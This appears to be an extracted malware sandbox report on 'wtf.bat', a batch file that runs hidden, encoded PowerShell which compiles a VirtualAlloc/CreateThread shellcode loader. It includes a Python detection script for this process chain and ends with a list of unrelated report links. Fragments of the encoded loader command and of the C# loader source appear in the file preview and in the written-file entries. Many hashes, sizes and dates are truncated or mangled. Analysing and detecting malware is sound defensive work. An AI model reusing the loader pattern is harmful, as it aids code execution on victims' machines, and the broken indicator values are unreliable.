  SHA-512: 001E0E5DC92EB6CB2B7ECD2E596DE5BEF705B0AB2EE906B924CC126DE7EF46FE005DBC32AD6A66A90 905D2D1BEF75C6EDE239EB52FEC2F516435C74
  Malicious:
  Reputation: low
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ITYUMQ4GZ7DU1K6VID7W.temp
  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  File Type: data
  Size (bytes): 016
  Entropy (bit):
  Encrypted:
  MD5: 5D769E55DE2CB077F904D6FB4007EF4
  SHA1: 9F45FF074C1259EC6C316F05FE97051A10
  SHA-256: 3DCD539A20C463CD DF250ABC993190C7CAD E76D9D
  SHA-512: 001E0E5DC92EB6CB2B7ECD2E596DE5BEF705B0AB2EE906B924CC126DE7EF46FE005DBC32AD6A66A90 905D2D1BEF75C6EDE239EB52FEC2F516435C74
  Malicious:
  Reputation: low
Contacted Domains/Contacted IPs
Contacted Domains: No contacted domains info
Contacted IPs: No contacted IP infos
Static File Info
General
File type: ASCII text, with very long lines, with no line terminators
Entropy (bit):
TrID:
File name: wtf.bat
File size: 6703
MD5 / SHA1 / SHA256 / SHA512: f6a9a366ea3fb b4 ccc b23daefd905b6fdd545917a f0d57a1406d97a372fa0c4df9a79aa742a9f624eab5e776 5aa c1ba79 39b442232ba2c1fcf9da140fc99ee544560c2a7b24 d2ea6d306d7b213a967413a7907a25dba6d fef2 073b169d2cc5ad1e d4
File Content Preview: powershell -nop -win Hidden -noni -enc JAAxACAAPQA gaccajabjacaapqagaccajwbbaeqababsaekabq BwAGAcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALg BkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMA dabhahqaaqbjacaazqb4ahqazqbyag4aiabjag 4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQB sagwabwbjacga
File Icon

Network Behavior
No network behavior found
Code Manipulations
Statistics
Behavior: cmd.exe, powershell.exe, powershell.exe, csc.exe
System Behavior
Analysis Process: cmd.exe PID: 3464 Parent PID: 302
General
Start time: 18:33:46
Start date: 19/05/2018
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\wtf.bat' '
Imagebase: 0x4a
File size: bytes
MD5 hash: AD7B9C1403B52BC532FBA594342B9
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
File Activities
File Read
File Path | Offset | Length | Completion | Count | Address | Symbol
C:\Users\user\Desktop\wtf.bat | unknown | 191 | success or wait | 1 | 4A514DE3 | ReadFile
C:\Users\user\Desktop\wtf.bat | unknown | 191 | end of file | 1 | 4A514DE3 | ReadFile
C:\Users\user\Desktop\wtf.bat | unknown | 191 | end of file | 1 | 4A514DE3 | ReadFile
C:\Users\user\Desktop\wtf.bat | unknown | 191 | end of file | 1 | 4A514DE3 | ReadFile
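The process tree recorded in this report (cmd.exe PID 3464 starting powershell.exe PID 3492, which starts powershell.exe PID 3544, which starts csc.exe PID 3596) together with the options the signatures flag (-enc, -win Hidden, -nop, -noni, a command line of several thousand characters, and csc.exe compiling Add-Type's temporary .cs file) is what an endpoint detection would key on. The following is an added example for this page, not Joe Sandbox code: it scores Sysmon Event ID 1 style records and rebuilds the parent chain from ParentProcessId. The events are constructed from the Startup list with a shortened payload; the explorer.exe parent of cmd.exe, the .NET Framework version directory and the 2048-character threshold for "very long" are assumptions, since the report elides or does not state them. Unlike a bare match on "-enc", it checks that the argument really decodes as UTF-16LE text, and it accepts every prefix of -EncodedCommand that powershell.exe does (-e, -ec, -en, ...).

```python
"""Flag, in process-creation telemetry, the behaviours the sandbox signatures record:
encoded and hidden PowerShell, very long command lines, and the
cmd.exe -> powershell.exe -> powershell.exe -> csc.exe chain that Add-Type produces.
Added example for this report; not Joe Sandbox code."""
import base64
import binascii
import re
from collections import defaultdict
from typing import List, Optional, Tuple

# Assumed threshold; the report does not state the length Joe Sandbox uses for "very long".
VERY_LONG_CMDLINE = 2048

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, plus the -ec alias.
_ENC_ALIASES = {"encodedcommand"[:i] for i in range(1, 15)} | {"ec"}
_FLAG_TOKEN = re.compile(r"(?i)(?:^|\s)[-/]([a-z]+)\s+([A-Za-z0-9+/=]{8,})")
_HIDDEN = re.compile(r"(?i)\s-w(?:in(?:dowstyle)?)?\s+hidden")
_NONINTERACTIVE = re.compile(r"(?i)\s-no(?:p|ni|profile|ninteractive)\b")

LOADER_CHAIN = ["cmd.exe", "powershell.exe", "powershell.exe", "csc.exe"]


def decode_utf16_b64(token: str) -> Optional[str]:
    """The script if token is base64 over UTF-16LE (what -enc takes), else None."""
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
        text = raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not text:
        return None
    printable = sum(ch.isprintable() or ch.isspace() for ch in text)
    return text if printable / len(text) > 0.95 else None


def find_encoded_command(cmdline: str) -> Optional[Tuple[str, str]]:
    """(flag, decoded script) for the first -e/-ec/-enc/... argument that really decodes."""
    for m in _FLAG_TOKEN.finditer(cmdline):
        if m.group(1).lower() in _ENC_ALIASES:
            script = decode_utf16_b64(m.group(2))
            if script is not None:
                return m.group(1), script
    return None


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev: dict) -> dict:
    """ev is a Sysmon Event ID 1 style record: ProcessId, ParentProcessId, Image, ParentImage, CommandLine."""
    cmd = ev["CommandLine"]
    image, parent = _basename(ev["Image"]), _basename(ev.get("ParentImage", ""))
    hits: List[str] = []
    if len(cmd) > VERY_LONG_CMDLINE:
        hits.append("very_long_cmdline")
    if image == "powershell.exe":
        if find_encoded_command(cmd):
            hits.append("encoded_command")
        if _HIDDEN.search(cmd):
            hits.append("hidden_window")
        if _NONINTERACTIVE.search(cmd):
            hits.append("noprofile_or_noninteractive")
        if parent == "cmd.exe":
            hits.append("spawned_by_cmd")
    if image == "csc.exe" and parent == "powershell.exe":
        hits.append("add_type_compile")
    return {"pid": ev["ProcessId"], "image": image, "hits": hits}


def loader_chains(events: List[dict]) -> List[List[int]]:
    """PID paths that follow LOADER_CHAIN exactly, rebuilt from ParentProcessId links."""
    by_pid = {e["ProcessId"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ParentProcessId"]].append(e["ProcessId"])
    found: List[List[int]] = []

    def walk(path: List[int]) -> None:
        names = [_basename(by_pid[p]["Image"]) for p in path]
        if names == LOADER_CHAIN:
            found.append(path)
        elif names == LOADER_CHAIN[: len(names)]:
            for child in children[path[-1]]:
                walk(path + [child])

    for e in events:
        if _basename(e["Image"]) == LOADER_CHAIN[0]:
            walk([e["ProcessId"]])
    return found


def _enc(script: str) -> str:  # builds the test vector the same way the .bat's payload was built
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Shortened stand-in for the runner: enough 0x.. tokens to push the command line past the threshold.
_RUNNER = "[Byte[]]$sc = " + ",".join(["0xfc"] * 600) + ";$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60}"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events modelled on the Startup list of this report (PIDs kept; the explorer.exe
# parent and the .NET Framework version directory are assumptions, the report does not show them).
EVENTS = [
    {"ProcessId": 3464, "ParentProcessId": 302, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\wtf.bat" '},
    {"ProcessId": 3492, "ParentProcessId": 3464, "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -nop -win Hidden -noni -enc " + _enc(_RUNNER)},
    {"ProcessId": 3544, "ParentProcessId": 3492, "Image": PS, "ParentImage": PS,
     "CommandLine": f'"{PS}" -nop -noni -enc ' + _enc(_RUNNER)},
    {"ProcessId": 3596, "ParentProcessId": 3544,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe", "ParentImage": PS,
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig'},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(score_event(ev))
    print("loader chains:", loader_chains(EVENTS))
```

score_event() returns the hit list per process and loader_chains() returns [[3464, 3492, 3544, 3596]] for the constructed events. The chain match is deliberately exact: a single powershell.exe with -enc is common in administration, whereas powershell.exe re-launching itself with an encoded command and then spawning csc.exe is the shape the Add-Type runner leaves behind.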

Analysis Process: powershell.exe PID: 3492 Parent PID: 3464
General
Start time: 18:33:47
Start date: 19/05/2018
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline: powershell -nop -win Hidden -noni -enc JAAxACAAPQAgACcAJABjACAAPQAgAC... (the complete encoded argument is reproduced under Startup for PID 3492)
Imagebase: 0x222d
File size: bytes
MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges: true
Programmed in: .net C# or VB.NET
Reputation: high
File Activities
File Read
File Path | Offset | Length | Completion | Count | Address | Symbol
C:\Windows\Microsoft.NET\Framework\v \CONFIG\machine.config | unknown | 4095 | success or wait | 1 | 6C9EC01C | unknown
C:\Windows\Microsoft.NET\Framework\v \CONFIG\machine.config | unknown | 6304 | success or wait | 3 | 6C9EC01C | unknown
C:\Windows\Microsoft.NET\Framework\v \CONFIG\machine.config | unknown | 4106 | success or wait | 1 | 6C9EC01C | unknown
C:\Windows\Microsoft.NET\Framework\v \CONFIG\security.config.cch | unknown | 4 | success or wait | 1 | 6C9AAC6F | ReadFile
C:\Windows\Microsoft.NET\Framework\v \CONFIG\enterprisesec.config.cch | unknown | 4 | success or wait | 1 | 6C9AAC6F | ReadFile
C:\Windows\Microsoft.NET\Framework\v \CONFIG\machine.config | unknown | 4095 | success or wait | 1 | 6C9EF210 | ReadFile
C:\Windows\Microsoft.NET\Framework\v \CONFIG\machine.config | unknown | 6304 | success or wait | 3 | 6C9EF210 | ReadFile
C:\Windows\Microsoft.NET\Framework\v \CONFIG\machine.config | unknown | 4106 | success or wait | 1 | 6C9EF210 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\getevent.types.ps1xml | unknown | 4096 | success or wait | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\getevent.types.ps1xml | unknown | 71 | end of file | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\getevent.types.ps1xml | unknown | 4096 | end of file | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | unknown | 4096 | success or wait | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | unknown | 4096 | end of file | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | unknown | 4096 | success or wait | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | unknown | 542 | end of file | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | unknown | 4096 | end of file | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.Format.ps1xml | unknown | 4096 | success or wait | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.Format.ps1xml | unknown | 7 | end of file | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.Format.ps1xml | unknown | 4096 | end of file | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | unknown | 4096 | success or wait | | | ReadFile

C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | unknown | 310 | end of file | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | unknown | 4096 | end of file | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | unknown | 4096 | success or wait | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | unknown | 50 | end of file | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | unknown | 4096 | end of file | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | unknown | 4096 | success or wait | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | unknown | 4096 | end of file | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | unknown | 4096 | success or wait | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | unknown | 201 | end of file | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | unknown | 4096 | end of file | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | unknown | 4096 | success or wait | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | unknown | 409 | end of file | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | unknown | 4096 | end of file | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | unknown | 4096 | success or wait | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | unknown | 44 | end of file | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | unknown | 4096 | end of file | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | unknown | 4096 | success or wait | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | unknown | 360 | end of file | | | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | unknown | 4096 | end of file | | | ReadFile
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\ bf356ad364e35\System.Management.Automation.dll | unknown | 4096 | success or wait | 1 | 6CA69FDE | unknown
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\ bf356ad364e35\System.Management.Automation.dll | | | | | |
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\ bf356ad364e35\System.Management.Automation.dll | | | | | |
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\ bf356ad364e35\System.Management.Automation.dll | | | | | |
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\ bf356ad364e35\System.Management.Automation.dll | | | | | |
C:\Windows\assembly\GAC_MSIL\System\ b77a5c561934e09\system.dll | unknown | 4096 | success or wait | 1 | 6CA69FDE | unknown
C:\Windows\assembly\GAC_MSIL\System\ b77a5c561934e09\system.dll | | | | | |
C:\Windows\assembly\GAC_MSIL\System\ b77a5c561934e09\system.dll | | | | | |
C:\Windows\assembly\GAC_MSIL\System\ b77a5c561934e09\system.dll | | | | | |
C:\Windows\assembly\GAC_MSIL\System\ b77a5c561934e09\system.dll | | | | | |

Analysis Process: powershell.exe PID: 3544 Parent PID: 3492

General
Start time: 18:33:49
Start date: 19/05/2018
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -noni -enc [base64-encoded command]
Imagebase: 0x222d
File size: bytes
MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

File Activities

File Created

File Path | Access | Attributes | Options | Completion | Count | Address | Symbol
C:\Users\user\AppData\Local\Temp\onkbqua.tmp | read attributes synchronize generic write | none | synchronous io non alert non directory file open no recall | success or wait | | | CreateFileW
C:\Users\user\AppData\Local\Temp\onkbqua.0.cs | read attributes synchronize generic write | none | synchronous io non alert non directory file open no recall | success or wait | | | CreateFileW
C:\Users\user\AppData\Local\Temp\onkbqua.dll | read attributes synchronize generic read generic write | none | synchronous io non alert non directory file open no recall | success or wait | | | CreateFileW
C:\Users\user\AppData\Local\Temp\onkbqua.cmdline | read attributes synchronize generic write | none | synchronous io non alert non directory file open no recall | success or wait | | | CreateFileW
C:\Users\user\AppData\Local\Temp\onkbqua.out | read attributes synchronize generic write | none | synchronous io non alert non directory file open no recall | success or wait | | | CreateFileW
C:\Users\user\AppData\Local\Temp\onkbqua.err | read attributes synchronize generic write | none | synchronous io non alert non directory file open no recall | success or wait | | | CreateFileW

File Deleted
File Path | Completion | Count | Address | Symbol
C:\Users\user\AppData\Local\Temp\onkbqua.0.cs | success or wait | | | DeleteFileW
C:\Users\user\AppData\Local\Temp\onkbqua.tmp | success or wait | | | DeleteFileW
C:\Users\user\AppData\Local\Temp\onkbqua.cmdline | success or wait | | | DeleteFileW
C:\Users\user\AppData\Local\Temp\onkbqua.dll | success or wait | | | DeleteFileW

File Written
File Path | Offset | Length | Ascii | Completion | Count | Address | Symbol
C:\Users\user\AppData\Local\Temp\onkbqua.0.cs | unknown | 557 | ...using System;.using System.Runtime.InteropServices;..namespace Win32Functions.{.public class Win32.{.[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpaddress, uint dwsize, uint flallocationtype, uint flprotect);[ | success or wait | | B | WriteFile

C:\Users\user\AppData\Local\Temp\onkbqua.cmdline | unknown | 327 | .../t:library /utf8output /R:"System.dll" /R:"C:\Windows\assembly\gac_msil\system.Management.automation\ bf356ad364e35\System.Management.automation.dll" /out:"c:\users\user\appdata\local\temp\onkbqua.dll" /D:DEBUG /debug+ /optimize- | success or wait | | B | WriteFile
C:\Users\user\AppData\Local\Temp\onkbqua.out | unknown | 422 | ...C:\Users\user\Desktop>"C:\Windows\Microsoft.NET\Framework\v \csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\ bf356ad364e35\System.management.automation.dll" /o | success or wait | | B | WriteFile

File Read
File Path | Offset | Length | Completion | Count | Address | Symbol
C:\Windows\Microsoft.NET\Framework\v \CONFIG\machine.config | unknown | 4095 | success or wait | 1 | 6C9EC01C | unknown
C:\Windows\Microsoft.NET\Framework\v \CONFIG\machine.config | unknown | 6304 | success or wait | 3 | 6C9EC01C | unknown
C:\Windows\Microsoft.NET\Framework\v \CONFIG\machine.config | unknown | 4106 | success or wait | 1 | 6C9EC01C | unknown
C:\Windows\Microsoft.NET\Framework\v \CONFIG\security.config.cch | unknown | 4 | success or wait | 1 | 6C9AAC6F | ReadFile
C:\Windows\Microsoft.NET\Framework\v \CONFIG\enterprisesec.config.cch | unknown | 4 | success or wait | 1 | 6C9AAC6F | ReadFile
C:\Windows\Microsoft.NET\Framework\v \CONFIG\machine.config | unknown | 4095 | success or wait | 1 | 6C9EF210 | ReadFile


More information

ID: Cookbook: urldownload.jbs Time: 20:47:24 Date: 09/12/2017 Version:

ID: Cookbook: urldownload.jbs Time: 20:47:24 Date: 09/12/2017 Version: ID: 0 Cookbook: urldownload.jbs Time: 20:4:24 Date: 0/12/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Cookbook: browseurl.jbs Time: 20:07:02 Date: 11/07/2018 Version:

ID: Cookbook: browseurl.jbs Time: 20:07:02 Date: 11/07/2018 Version: ID: 67658 Cookbook: browseurl.jbs Time: 20:07:02 Date: 11/07/2018 Version: 23.0.0 Table of Contents Analysis Report Overview Information Detection Confidence Classification Analysis Advice Signature Overview

More information

ID: Sample Name: dronefly.apk Cookbook: default.jbs Time: 10:24:54 Date: 07/06/2018 Version:

ID: Sample Name: dronefly.apk Cookbook: default.jbs Time: 10:24:54 Date: 07/06/2018 Version: ID: 001 Sample Name: dronefly.apk Cookbook: default.jbs Time: 10:24:4 Date: 0/0/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Cookbook: urldownload.jbs Time: 11:39:45 Date: 07/04/2018 Version:

ID: Cookbook: urldownload.jbs Time: 11:39:45 Date: 07/04/2018 Version: ID: 53619 Cookbook: urldownload.jbs Time: 11:39:45 Date: 07/04/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Sample Name: Liste_az.docx Cookbook: defaultwindowsofficecookbook.jbs Time: 00:17:54 Date: 30/12/2017 Version:

ID: Sample Name: Liste_az.docx Cookbook: defaultwindowsofficecookbook.jbs Time: 00:17:54 Date: 30/12/2017 Version: ID: 41280 Sample Name: Liste_az.docx Cookbook: defaultwindowsofficecookbook.jbs Time: 00:17:54 Date: 30/12/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview Information

More information

ID: Sample Name: Dxd1yOZMU1.bin Cookbook: defaultwindowsofficecookbook.jbs Time: 09:43:59 Date: 21/10/2017 Version:

ID: Sample Name: Dxd1yOZMU1.bin Cookbook: defaultwindowsofficecookbook.jbs Time: 09:43:59 Date: 21/10/2017 Version: ID: 34788 Sample Name: Dxd1yOZMU1.bin Cookbook: defaultwindowsofficecookbook.jbs Time: 0:43:5 Date: 21/10/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information

More information

ID: Sample Name: tesseract-ocrsetup exe. Cookbook: default.jbs Time: 16:44:15 Date: 12/02/2018 Version:

ID: Sample Name: tesseract-ocrsetup exe. Cookbook: default.jbs Time: 16:44:15 Date: 12/02/2018 Version: ID: 46161 Sample Name: tesseract-ocrsetup-3.05.01.exe Cookbook: default.jbs Time: 16:44:15 Date: 12/02/2018 Version: 20.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Sample Name: dialog.nvp Cookbook: default.jbs Time: 00:09:12 Date: 10/05/2018 Version:

ID: Sample Name: dialog.nvp Cookbook: default.jbs Time: 00:09:12 Date: 10/05/2018 Version: ID: 09 Sample Name: dialog.nvp Cookbook: default.jbs Time: 00:09:12 Date: 10/0/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:55:50 Date:

ID: Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:55:50 Date: ID: 244 Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:55:50 Date: 05/10/201 Version: 24.0.0 Fire Opal Table of Contents

More information

ID: Sample Name: 5GeZNwROcB.bin Cookbook: default.jbs Time: 15:22:54 Date: 30/11/2017 Version:

ID: Sample Name: 5GeZNwROcB.bin Cookbook: default.jbs Time: 15:22:54 Date: 30/11/2017 Version: ID: 82 Sample Name: GeZNwROcB.bin Cookbook: default.jbs Time: 1:22:4 Date: 0/11/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Cookbook: browseurl.jbs Time: 16:58:45 Date: 04/06/2018 Version:

ID: Cookbook: browseurl.jbs Time: 16:58:45 Date: 04/06/2018 Version: ID: 62529 Cookbook: browseurl.jbs Time: 16:58:45 Date: 04/06/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:52:31 Date:

ID: Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:52:31 Date: ID: 244 Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:52:31 Date: 05/10/201 Version: 24.0.0 Fire Opal Table of Contents

More information

ID: Cookbook: urldownload.jbs Time: 21:28:55 Date: 28/06/2018 Version:

ID: Cookbook: urldownload.jbs Time: 21:28:55 Date: 28/06/2018 Version: ID: 6600 Cookbook: urldownload.jbs Time: 21:2:55 Date: 2/06/201 Version: 23.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature Overview Networking:

More information

ID: Sample Name: PO xls Cookbook: defaultwindowsofficecookbook.jbs Time: 03:13:36 Date: 08/01/2018 Version:

ID: Sample Name: PO xls Cookbook: defaultwindowsofficecookbook.jbs Time: 03:13:36 Date: 08/01/2018 Version: ID: 41861 Sample Name: PO65445465.xls Cookbook: defaultwindowsofficecookbook.jbs Time: 03::36 Date: 08/01/2018 Version: 20.0.0 Table of Contents Analysis Report Overview Information Detection Confidence

More information

ID: Cookbook: browseurl.jbs Time: 10:12:02 Date: 15/01/2018 Version:

ID: Cookbook: browseurl.jbs Time: 10:12:02 Date: 15/01/2018 Version: ID: 42670 Cookbook: browseurl.jbs Time: 10:12:02 Date: 15/01/2018 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Sample Name: faktury_pdf.rar Cookbook: default.jbs Time: 12:24:33 Date: 15/12/2017 Version:

ID: Sample Name: faktury_pdf.rar Cookbook: default.jbs Time: 12:24:33 Date: 15/12/2017 Version: ID: 4019 Sample Name: faktury_pdf.rar Cookbook: default.jbs Time: 12:24: Date: 1/12/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Sample Name: vlaue.exe Cookbook: default.jbs Time: 18:54:49 Date: 26/01/2018 Version:

ID: Sample Name: vlaue.exe Cookbook: default.jbs Time: 18:54:49 Date: 26/01/2018 Version: ID: 44024 Sample Name: vlaue.exe Cookbook: default.jbs Time: 18:4:49 Date: 2/01/2018 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Sample Name: lt.pak Cookbook: default.jbs Time: 12:40:34 Date: 26/07/2018 Version:

ID: Sample Name: lt.pak Cookbook: default.jbs Time: 12:40:34 Date: 26/07/2018 Version: ID: 90 Sample Name: lt.pak Cookbook: default.jbs Time: 12:40:4 Date: 2/0/201 Version: 2.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification

More information

ID: Cookbook: urldownload.jbs Time: 20:31:48 Date: 13/04/2018 Version:

ID: Cookbook: urldownload.jbs Time: 20:31:48 Date: 13/04/2018 Version: ID: 54693 Cookbook: urldownload.jbs Time: 20:31:48 Date: 13/04/2018 Version: 22.0.0 Table of Contents Analysis Report Overview Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Sample Name: gpg4win exe.sig Cookbook: default.jbs Time: 21:44:31 Date: 02/02/2018 Version:

ID: Sample Name: gpg4win exe.sig Cookbook: default.jbs Time: 21:44:31 Date: 02/02/2018 Version: ID: Sample Name: gpgwin-.0..exe.sig Cookbook: default.jbs Time: 21::1 Date: 02/02/2018 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Cookbook: browseurl.jbs Time: 16:56:06 Date: 13/02/2018 Version:

ID: Cookbook: browseurl.jbs Time: 16:56:06 Date: 13/02/2018 Version: ID: 46296 Cookbook: browseurl.jbs Time: 16:56:06 Date: 13/02/2018 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Cookbook: browseurl.jbs Time: 14:46:55 Date: 31/08/2018 Version:

ID: Cookbook: browseurl.jbs Time: 14:46:55 Date: 31/08/2018 Version: ID: 74919 Cookbook: browseurl.jbs Time: 14:46:55 Date: 31/08/2018 Version: 23.0.0 Table of Contents Table of Contents Analysis Report http://tiny.cc/34aqxy Overview General Information Detection Confidence

More information

ID: Cookbook: browseurl.jbs Time: 07:02:50 Date: 27/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 07:02:50 Date: 27/03/2018 Version: ID: 51900 Cookbook: browseurl.jbs Time: 07:02:50 Date: 27/03/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature Overview Networking:

More information

ID: Sample Name: 2.bin Cookbook: defaultwindowsofficecookbook.jbs Time: 14:00:56 Date: 17/06/2018 Version:

ID: Sample Name: 2.bin Cookbook: defaultwindowsofficecookbook.jbs Time: 14:00:56 Date: 17/06/2018 Version: ID: 64333 Sample Name: 2.bin Cookbook: defaultwindowsofficecookbook.jbs Time: 14:00:56 Date: 17/06/2018 Version: 22.0.0 Table of Contents Analysis Report Overview Information Detection Confidence Classification

More information

ID: Cookbook: browseurl.jbs Time: 20:56:26 Date: 03/07/2018 Version:

ID: Cookbook: browseurl.jbs Time: 20:56:26 Date: 03/07/2018 Version: ID: 66665 Cookbook: browseurl.jbs Time: 20:56:26 Date: 03/07/2018 Version: 23.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Sample Name: modulecheck.js Cookbook: default.jbs Time: 17:46:31 Date: 01/02/2018 Version:

ID: Sample Name: modulecheck.js Cookbook: default.jbs Time: 17:46:31 Date: 01/02/2018 Version: ID: 44491 Sample Name: modulecheck.js Cookbook: default.jbs Time: 17:4:31 Date: 01/02/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Cookbook: browseurl.jbs Time: 00:12:30 Date: 24/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 00:12:30 Date: 24/03/2018 Version: ID: 51630 Cookbook: browseurl.jbs Time: 00:12:30 Date: 24/03/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Cookbook: browseurl.jbs Time: 22:12:09 Date: 17/11/2017 Version:

